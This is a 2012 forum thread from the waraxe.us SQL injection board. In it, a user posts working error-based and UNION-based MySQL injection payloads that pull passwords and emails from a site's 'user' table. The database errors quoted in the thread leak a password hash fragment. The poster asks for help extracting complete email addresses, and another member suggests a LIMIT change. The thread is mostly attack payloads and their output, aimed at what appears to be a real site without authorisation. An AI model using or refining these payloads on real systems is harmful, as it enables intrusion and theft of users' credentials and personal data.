|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Advanced Blind SQL injection [Problem] |
|
Posted: Tue Jul 10, 2012 9:25 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
Hi, , I was in full action when I got this problem, I tried to bypass with many function, So i give it to you ..
Code: | id=10 /*!and(select 1 from(select count(*),concat((select (password) from user limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/ |
Could not run query: Duplicate entry '$1$wCyNAIk1' for key 'group_key' ===> working
Code: |
id=10 /*!and(select 1 from(select count(*),concat((select (email) from user limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/ |
Could not run query: Subquery returns more than 1 row ===> not working
Code: | id=1 UNION/**/SELECT/**/1,2,email,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user limit 6,1-- |
Could not run query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@hotmail.com' at line 1 ===> working but not full
It's evident, I can't view "email" column name with the first request .. So even with the last one (simple) it doesn't appear completly with a full email .. So wish you can help me. |
|
|
|
|
|
|
|
|
Posted: Sat Jul 14, 2012 3:12 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Sat Jul 14, 2012 4:42 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
pexli wrote: | If you try limit 1,1 ? |
The same ! not complet |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|